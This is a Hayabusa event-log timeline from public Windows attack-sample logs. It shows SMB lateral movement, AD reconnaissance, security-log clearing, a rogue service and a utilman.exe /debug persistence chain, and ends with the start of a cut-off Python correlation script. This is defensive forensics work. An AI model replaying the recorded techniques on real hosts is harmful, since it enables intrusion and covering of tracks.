2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: user01 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: \??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 
0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:41:29.008 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 
0x39e47fa | PID: 3092 | PGUID: 365ABB72-2560-5C91-0000-0010C721DA05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
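The rows above contain two patterns worth correlating by hand: a remote session from 10.0.2.17 (ANONYMOUS LOGON, then an Administrator network logon whose Logon ID 0x17e2c0 ties the IPC$ and ADMIN$ share access and the Temp\CYAlyNSS.tmp file access together, with a 4699 scheduled-task event a few hundred milliseconds later) and Sysmon process-creation rows whose parent/child pairs matter more than the image names (winlogon.exe spawning utilman.exe /debug, which spawns osk.exe; later in this timeline services.exe spawning calc.exe and cmd.exe). The script below is an added example, not Hayabusa's code or the sample-evtx project's, that parses Hayabusa's CSV and `Details` column and runs both correlations. Its input is a constructed excerpt of rows copied from this timeline with the RulePath and FilePath columns replaced by placeholders; the 30 s window, the `SERVICE_IMAGES` and `ACCESSIBILITY` allowlists and the function names are assumptions of the example.

```python
"""Correlate rows of a Hayabusa CSV timeline offline.  Added example, not part
of Hayabusa.  (1) rebuild a remote execution chain over SMB by Logon ID
(4624 type 3 -> 5140/5145 share access -> 4698/4699 task events), (2) flag
parent/child anomalies in Sysmon event 1 rows.  Window and allowlists are
heuristics (assumptions), not Hayabusa or Sigma logic."""
import csv
import io
import ntpath
from datetime import datetime, timedelta

# Constructed input: rows copied from the timeline, RulePath/FilePath replaced
# by placeholders so the block runs stand-alone.
SAMPLE_CSV = r'''Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,rule.yml,sample.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rule.yml,sample.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rule.yml,sample.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rule.yml,sample.evtx
2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rule.yml,sample.evtx
2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,rule.yml,sample.evtx
2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,rule.yml,sample.evtx
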